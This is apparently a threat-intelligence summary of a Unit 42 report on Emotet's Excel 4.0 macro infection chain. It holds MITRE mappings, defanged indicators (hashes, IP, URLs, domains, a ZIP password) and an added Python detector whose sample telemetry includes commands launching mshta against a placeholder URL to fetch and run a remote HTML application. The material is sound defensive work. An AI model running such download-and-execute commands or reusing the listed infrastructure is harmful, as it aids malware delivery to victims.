Unit 42 outlines a renewed Emotet infection method that uses an Excel 4.0 macro in a phishing email to stage PowerShell payloads and finally deliver the Emotet binary. The approach relies on obfuscated macros, a highly obfuscated HTML application, and multiple URLs to improve resilience against takedowns. #Emotet #Excel4.0
Key Points
- Emotet’s infection chain now starts with a phishing email delivering an Excel file containing an obfuscated Excel 4.0 macro.
- The macro executes cmd.exe to run mshta.exe, which retrieves and executes a remote HTML application.
- The HTML application is highly obfuscated and downloads additional PowerShell code for stage two.
- The initial PowerShell downloader connects to a remote URL to fetch a second-stage PowerShell payload.
- The second-stage PowerShell script contains 14 URLs to retrieve the Emotet binary, increasing resilience against takedowns.
- The final Emotet payload is loaded from an encrypted PE stored in the DLL’s resource section.
- Emotet commonly uses thread hijacking and various email lures (including password-protected ZIPs) to advance infections.
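The chain in the key points above (Excel 4.0 macro spawns cmd.exe, which launches mshta.exe against a remote HTML application) leaves a distinctive process ancestry in endpoint telemetry. The following detection logic is an added example, not code from the Unit 42 post; it runs over constructed process-creation records, and the ProcEvent field names, the URL and the file paths in the sample are assumptions, not indicators from the page.

```python
import re
from dataclasses import dataclass

# Minimal process-creation record (field names are an assumption; Sysmon Event ID 1
# carries the same data as ProcessId / ParentProcessId / Image / CommandLine).
@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}

def basename(path: str) -> str:
    # Lower-cased file name of a Windows or POSIX path.
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def find_mshta_chains(events: list[ProcEvent]) -> list[dict[str, str]]:
    """One finding per mshta.exe launched with a remote URL argument. Severity is
    'high' for the Office app -> cmd.exe -> mshta.exe ancestry, otherwise 'medium'."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        url = URL_RE.search(e.cmdline)
        if basename(e.image) != "mshta.exe" or url is None:
            continue
        # Walk up to two ancestors to reconstruct the spawn chain.
        chain, cur = [basename(e.image)], by_pid.get(e.ppid)
        while cur is not None and len(chain) < 3:
            chain.append(basename(cur.image))
            cur = by_pid.get(cur.ppid)
        office_chain = len(chain) == 3 and chain[1] == "cmd.exe" and chain[2] in OFFICE_APPS
        findings.append({
            "pid": str(e.pid),
            "chain": " -> ".join(reversed(chain)),
            "url": url.group(0),
            "severity": "high" if office_chain else "medium",
        })
    return findings

# Constructed sample telemetry; paths, user name and URL are placeholders, not real indicators.
SAMPLE_EVENTS = [
    ProcEvent(100, 50, r"C:\Office\EXCEL.EXE", r'EXCEL.EXE "C:\Users\user\Downloads\form.xlsm"'),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe", "cmd /c mshta http://hta.example.invalid/k.hta"),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe", "mshta http://hta.example.invalid/k.hta"),
    # Benign: mshta run from Explorer against a local .hta, no URL argument, so not flagged.
    ProcEvent(400, 50, r"C:\Windows\System32\mshta.exe", r"mshta C:\Tools\setup.hta"),
]
```

Feeding real Sysmon or EDR process events into `find_mshta_chains` only requires mapping their fields onto `ProcEvent`.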
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – The campaign delivers an Excel file by email; the document carries an obfuscated Excel 4.0 macro. ‘The new attack delivers an Excel file through email, and the document contains an obfuscated Excel 4.0 macro.’
- [T1204.002] User Execution: Malicious File – The victim must enable macros on a vulnerable Windows host before the malicious content is activated. ‘The victim must enable macros on a vulnerable Windows host before the malicious content is activated.’
- [T1059.003] Windows Command Shell – Once enabled, the macro executes cmd.exe, which runs mshta.exe with an argument that retrieves and executes a remote HTML application. ‘When the macro code is enabled, it executes cmd.exe to run mshta.exe with an argument to retrieve and execute a remote HTML application.’
- [T1218.005] Signed Binary Proxy Execution: Mshta – The HTML application downloaded via mshta leads to further script execution. ‘The HTML application shown in Figure 4 is highly obfuscated. It will download and execute additional PowerShell code.’
- [T1059.001] PowerShell – The initial and second-stage PowerShell code retrieve and execute Emotet payloads from remote sources. ‘The initial obfuscated PowerShell script… connects to hxxp://91.240.118[.]168/se/s.png. This URL returns text-based script for a second-stage set of PowerShell code designed to retrieve an Emotet binary.’
- [T1071.001] Web Protocols – The malware uses HTTP(S) URLs to fetch stage components and binaries across multiple stages. ‘The second-stage PowerShell code contains 14 URLs to retrieve the Emotet binary.’
- [T1027.001] Obfuscated/Compressed Files and Information – Hex and character obfuscation in the Excel macro, together with the heavily obfuscated HTML application, hinder static detection. ‘hex and character obfuscation…’
Indicators of Compromise
- [Hash] 9f22626232934970e4851467b7b746578f0f149984cd0e4e1a156b391727fac9 – Appendix A (form.zip)
- [Hash] 6d55f25222831cce73fd9a64a8e5a63b002522dc2637bd2704f77168c7c02d88 – Appendix A (form.xlsm)
- [Hash] 9bda03babb0f2c6aa9861eca95b33af06a650e2851cce4edcc1fc3abd8e7c2a1 – Appendix B (First-stage PowerShell script)
- [Hash] 5bd4987db7e6946bf2ca3f73e17d6f75e2d8217df63b2f7763ea9a6ebcaf9fed – Appendix B (Second-stage PowerShell script)
- [Hash] 2de72908e0a1ef97e4e06d8b1ba3dc0d76f580cdf36f96b5c919bea770b2805f – Appendix D (Emotet DLL)
- [IP] 91.240.118[.]168 – Appendix B (PowerShell downloader URL)
- [URL] hxxp://unifiedpharma[.]com/wp-content/5arxM/ – Appendix C
- [URL] hxxp://hotelamerpalace[.]com/Fox-C404/LEPqPJpt4Gbr8BHAn/ – Appendix C
- [Domain] unifiedpharma[.]com – Appendix C
- [Domain] crmweb[.]info – Appendix C
- [Domain] hotelamerpalace[.]com – Appendix C
- [File] ssd.dll – Appendix D
- [File path] C:\Users\Public\Documents\ssd.dll – Appendix D
- [File path] C:\Users\[username]\AppData\Local\[random characters]\[random characters].[random characters] – Appendix D
- [Password] EHGWQARLC – Appendix A
Read more: https://unit42.paloaltonetworks.com/new-emotet-infection-method/